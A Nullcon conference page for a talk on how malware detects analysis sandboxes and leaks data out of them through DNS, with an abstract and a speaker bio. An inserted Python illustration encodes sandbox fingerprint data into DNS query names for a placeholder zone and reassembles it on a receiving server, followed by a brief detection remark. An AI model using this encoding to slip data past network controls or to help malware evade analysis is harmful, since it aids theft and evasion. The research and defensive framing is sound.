Zoltan Balazs

CTO, MRG Effitas (Netherlands)

Paper Title

Sandbox detection: Abuse, test, leak

Abstract

Manual processing of malware samples became impossible years ago. Sandboxes are used to automate the analysis of malware samples to gather information about the dynamic behaviour of the malware, both at AV companies and at enterprises. Some malware samples use known techniques to detect when they run in a sandbox, but most of these sandbox detection techniques can be easily detected and thus flagged as malicious. During my research I invented new approaches to detect these sandboxes. I developed (and will publish during my presentation) a tool which can collect a lot of interesting information from these sandboxes to create statistics on how the current technologies work (and fail). After analysing these results I will demonstrate tricks to detect sandboxes. These tricks can’t be easily flagged as malicious. Some sandboxes don’t interact with the Internet in order to block data extraction, but with some DNS-fu the information can be extracted from these appliances as well.

This presentation will include a lot of interaction with the audience as we analyse the results together.

If you already have bought or are planning to buy a “magic” malware analysis/detection sandbox, this is a must-see presentation for you. The sandbox detection techniques used in “APT”s like BlackEnergy or DOUBLEFANTASY can be considered old and outdated, and they lack creativity compared to these new techniques.
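The abstract mentions extracting collected data from sandboxes that block Internet access by using DNS. The following is an added illustration of the encoding side of that idea, not the speaker's tool and not code from the talk: it packs constructed fingerprint data into DNS query names that respect the RFC 1035 label and name limits, and shows how a receiver that only sees the queries (in any order, with resolver retries) can reassemble the original bytes. The zone `c.example.com`, the sample fingerprint and the sequence-label layout are all assumptions made for the example; nothing here touches the network.

```python
"""Added example: packing collected data into DNS query names and
reassembling it on the receiving side. Illustrative only; it builds
and parses names, it never sends a query."""
import base64

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # practical maximum length of a full domain name

# Constructed sample of the kind of data a collector might gather
# inside a sandbox (values are made up for this example).
SAMPLE = (
    b"host=WIN7-PC;user=admin;cpus=1;ram=1024;"
    b"disk=20G;uptime=41;mac=08:00:27:11:22:33;"
    b"procs=explorer.exe,svchost.exe,vmtoolsd.exe;"
    b"mouse=0;screen=1024x768;bios=VirtualBox;"
)
ZONE = "c.example.com"   # assumed collector zone whose NS the sender controls


def encode_queries(data: bytes, zone: str) -> list[str]:
    """Split data into names of the form <seq>.<b32>.<b32>...<zone>.

    Base32 is used because DNS names are case-insensitive (resolvers may
    even randomise case) and may not carry '=' or '/'. The leading
    sequence label keeps every name unique, so a cached answer never
    swallows a query, and lets the receiver reorder what it sees."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    names, seq = [], 0
    while labels:
        parts = [str(seq)]
        # Greedily add payload labels while the full name stays within MAX_NAME
        while labels and len(".".join(parts + [labels[0], zone])) <= MAX_NAME:
            parts.append(labels.pop(0))
        if len(parts) == 1:
            raise ValueError("zone too long to carry even one payload label")
        names.append(".".join(parts + [zone]))
        seq += 1
    return names


def decode_queries(queries: list[str], zone: str) -> bytes:
    """Rebuild the data from observed query names, in any order, with
    duplicates (resolver retries) and unrelated queries mixed in."""
    suffix = "." + zone.lower()
    chunks: dict[int, str] = {}
    for q in queries:
        q = q.lower().rstrip(".")
        if not q.endswith(suffix):
            continue                      # unrelated query, ignore it
        parts = q[:-len(suffix)].split(".")
        seq, payload = int(parts[0]), "".join(parts[1:])
        chunks.setdefault(seq, payload)   # first copy of a retried query wins
    if sorted(chunks) != list(range(len(chunks))):
        raise ValueError("missing sequence numbers, data incomplete")
    b32 = "".join(chunks[k] for k in sorted(chunks)).upper()
    b32 += "=" * (-len(b32) % 8)          # restore the base32 padding
    return base64.b32decode(b32)


def roundtrip(data: bytes, zone: str) -> bool:
    """Encode, shuffle in reverse with a duplicate and a stray query, decode."""
    names = encode_queries(data, zone)
    observed = list(reversed(names)) + names[:1] + ["www.example.org"]
    return decode_queries(observed, zone) == data


if __name__ == "__main__":
    for name in encode_queries(SAMPLE, ZONE):
        print(len(name), name)
    print("roundtrip ok:", roundtrip(SAMPLE, ZONE))
```

The receiving side in practice is the authoritative name server for the zone, which logs every query name it is asked for; the sandbox's own resolver forwards the lookups even when all other outbound traffic is dropped. The defensive check follows from the same layout: long, high-entropy labels and many unique subdomains under one zone are what a DNS monitoring rule should count.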

Speaker Bio

Zoltan (@zh4ck) is the Chief Technology Officer at MRG Effitas, a company focusing on AV testing.
Before MRG Effitas, he worked as an IT security expert in the financial industry for 5 years and as a senior IT security consultant at one of the Big Four companies for 2 years. His main areas of expertise are penetration testing, malware analysis, computer forensics and security monitoring. He released the Zombie browser tool, which contains proof-of-concept malicious browser extensions for Firefox, Chrome and Safari. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass). He has been invited to give presentations at information security conferences worldwide, including DEF CON, Hacker Halted USA, Hackcon, OHM, Hacktivity and Ethical Hacking.

Copyright © 2023 | Nullcon India | International Security Conference | All Rights Reserved